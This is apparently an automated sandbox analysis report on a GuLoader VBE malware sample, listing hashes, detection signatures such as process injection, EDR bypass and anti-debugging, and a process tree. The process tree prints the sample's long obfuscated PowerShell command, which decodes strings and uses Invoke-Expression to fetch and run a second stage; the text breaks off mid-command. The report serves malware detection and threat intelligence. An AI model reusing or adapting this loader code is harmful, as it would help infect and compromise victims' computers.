Edit tour
Windows
Analysis Report
EL-25-536_40005512_Le Cuivre_23102024.vbe
Overview
General Information
| Sample name: | EL-25-536_40005512_Le Cuivre_23102024.vbe |
| Analysis ID: | 1540843 |
| MD5: | 575f235ff45c6a6697fba7172ff403a8 |
| SHA1: | d9ed6dc4fd26fbed5d50db60ac696d6eac1eed37 |
| SHA256: | 571c0365a3bd9d99f9df9c8e91473425db45064a304a4882f8b4e6d14ec6d81a |
| Tags: | vbeuser-abuse_ch |
| Infos: |   |
 | |
Detection
GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7100 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\EL-25 -536_40005 512_Le Cui vre_231020 24.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 6044 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" " <#Bishop ing Kropsv isitering Privateje Espying Ge nes Gossip ingly #>;$ Scarifies1 17='Sammen snredes';< #Barometri ske Sardan apalian Cu stomiser M iljteknike ren Unwrit ten #>;$Ab ovedeck=$A utografsam lers+$host .UI; funct ion Plumet ($Pendultr afik){If ( $Abovedeck ) {$Beedig elsers++;} $Superinsi stently=$P roelectric +$Pendultr afik.'Leng th'-$Beedi gelsers; f or( $Melol onthine=5; $Melolonth ine -lt $S uperinsist ently;$Mel olonthine+ =6){$Swive leye=$Melo lonthine;$ Warks+=$Pe ndultrafik [$Melolont hine];$Unc onservativ ely='Mongo lism';}$Wa rks;}funct ion Extral egal($Bost ter){ & ( $Forfdrene s) ($Bostt er);}$Rese rvationssl ipper=Plum et 'WgstrM BoyaroKujo nzCorpsiRe diglFo mel Non,oaBene d/Mah r '; $Reservati onsslipper +=Plumet ' Lsesu5Knub s. Cl p0Ti dv. s til( .esknW Ind ii rosn Ly indFlaunok oncewaugme spanto Rek noNHvekoTf ila Kniks1 Dolkh0Apne a. ilja0Qu ali;B lki HjallW,pli niR facn G .no6R,lak4 Zygne;Glen d retrxAss ur6Bibli4S .ear; Mask Camstrrek orv taxi:e nsky1Udste 3Nob l1Tem pt.Hamar0D el b)Perp PharmGUnbu seNyas,c o ntok Aurio Emitt/Kofa n2Udrik0In dig1 Plug0 ove,f0 Res p1Godke0fi ske1Bicyc FrerF econ i .ermrRek .neAgatefN touo.ulfa xTenni/,rr iv1 d ta3I nd.u1Knapp .Vin.i0Fld ei ';$Feri egiroens=P lumet 'Van keU Ba ySD iarte Stan RHaand- Am aaKartoG Gr sE alan NBerustOle ac ';$Halm knippernes =Plumet ' astahBagly t Kon tstr ipp.attlsK .teg:Glade /Bet l/Pr mudVamperT elexi Deri vG usceDup le.SpillgO dorsoHebra okupingin talStrikeS la.e. Vi e cSamenoB,r bim Ngle/ elemu,rfev cDress?a r ile In.uxO scupTympa oPaastrRer oltAerop=s ponsdTangi o SidewCon don.ivillT ilkmoKi.of aVarsedUnm .n&BluebiG ainldDisgu =U,der1Kat suqSamsi6U dtagCPerfe YT end4Me ryoFarveUR epartAllob c Cu loLac t.u Anve- Bil.a Skyp V ShinhLar giAWhisk3 Goom_Unin v BaffULef tiUCeritU GallrKredi fRisikOEmb oONavewB agesqkanur CHaranrDag hod Cod 8T ouch ';$Un predicable ness=Plume t 'Rvert>O shac ';$Fo rfdrenes=P lumet 'Elu iIRen.eeD isruXPreda ';$Melolo nthinetali anation='S ynentognat h';$Klagen 142='\Gesj ftigere.Si g';Extrale gal (Plume t ' Kant$ gestG,opov lAfrivo ga r bAfkrya nil lF rpe :AcculsCou ntTFederET abulNSuben O Hoo TUnv itYU,eskp BegrIK pro sExcerTSou n.=Ut,li$S pencERasca nShittvba uq:czecha KnuspGerrh P.ositDFef niACor ntU pdivAPilsn +Stf,o$Sta tukBort LB ytniAU cal G.ubsiEfol kenkosmo1A f,ik4T att 2 Vacc '); Extralegal (Plumet ' Ekstr$Time GReneglTr iesoParjrB Ev ghA Pho tlOpt d:No nreK H veA AnatoL Con clTha lIEn slaGAnti r so stAF,yp aFRokkeIPe rig= B un$ botchhBl f raShrimL M entMCitrok S,ntiN amm eiOverpP a rplpAutheE EuroprTank enBiko,eTi ldnsCong .